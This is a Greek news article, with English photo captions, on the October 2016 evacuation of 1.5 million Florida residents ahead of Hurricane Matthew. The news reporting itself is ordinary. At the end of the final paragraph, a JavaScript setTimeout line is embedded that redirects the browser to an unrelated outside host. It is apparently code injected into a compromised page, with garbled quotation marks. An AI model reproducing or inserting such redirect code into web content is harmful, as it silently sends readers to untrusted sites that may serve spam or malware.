Ανησυχία στις ΗΠΑ – 1,5 εκατ. κάτοικοι απομακρύνονται από τα σπίτια τους λόγω Μάθιου (EIKONEΣ)

0
10

 

Ενάμισι εκατομμύριο κάτοικοι της Φλόριντα πήραν εντολή να απομακρυνθούν από τις εστίες τους για να διαφύγουν από τον ισχυρό κυκλώνα Μάθιου, ο οποίος έσπειρε ήδη την καταστροφή στην Αϊτή και αλλού στην Καραϊβική, ανακοίνωσε σήμερα ο κυβερνήτης της Πολιτείας.

The high winds of Hurricane Matthew roar over Baracoa on Tuesday, October 4.

«Ανησυχούμε ιδιαίτερα για το Παλμ Μπιτς (νοτιοανατολική Φλόριντα). Είναι η πρώτη ζώνη που θα πληγεί και αυτό θα συμβεί μέσα στις ερχόμενες ώρες. Δεν απομένει πολύς χρόνος», προειδοποίησε με πολύ σοβαρό ύφος ο κυβερνήτης στη διάρκεια ενημέρωσης των δημοσιογράφων.

In preparation for the hurricane, people fill up with gas in Fort Lauderdale, Florida.

Σύμφωνα με τις τελευταίες προβλέψεις του αμερικανικού κέντρου παρακολούθησης των κυκλώνων, ο Μάθιου θα πλήξει τη Φλόριντα τη νύκτα της Πέμπτης προς την Παρασκευή. «Είναι ο ισχυρότερος εδώ και δεκαετίες κυκλώνας που πληττει αυτή τη ζώνη», υπογραμμίζει το NHC.

Shoppers clear shelves at a supermarket in Titusville, Florida, as Hurricane Matthew churns towards the US coast, October 5, 2016. Thousands of people potentially in the path of Hurricane Matthew fled inland Wednesday, as parts of Georgia, Florida and South Carolina <a href="http://www.cnn.com/2016/10/05/us/hurricane-matthew-florida-carolinas/index.html" target="_blank">issued mandatory evacuations</a> for areas most likely to be affected.

«Ο χρόνος πιέζει», υπογράμμισε ο κυβερνήτης, ο οποίος επιχειρεί να πείσει τους κατοίκους της Πολιτείας του να πάρουν στα σοβαρά τον κίνδυνο και να μεταβούν από τώρα σε καταφύγια όσο το δυνατόν πιο μέσα στην ενδοχώρα.

Bus drivers in North Charleston, South Carolina, wait for word to start evacuations.

«Ελπίζουμε για το καλύτερο, αλλά προετοιμαζόμαστε για το χειρότερο», είπε ο κυβερνήτης, ο οποίος ανακοίνωσε πως κινητοποίησε 1.000 επιπλέον μέλη της Εθνοφυλακής, αυξάνοντας έτσι σε 2.500 τον αριθμό των στρατιωτικών που είναι έτοιμοι να βοηθήσουν σε απομακρύνσεις κατοίκων και τη διαχείριση των καταφυγίων. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here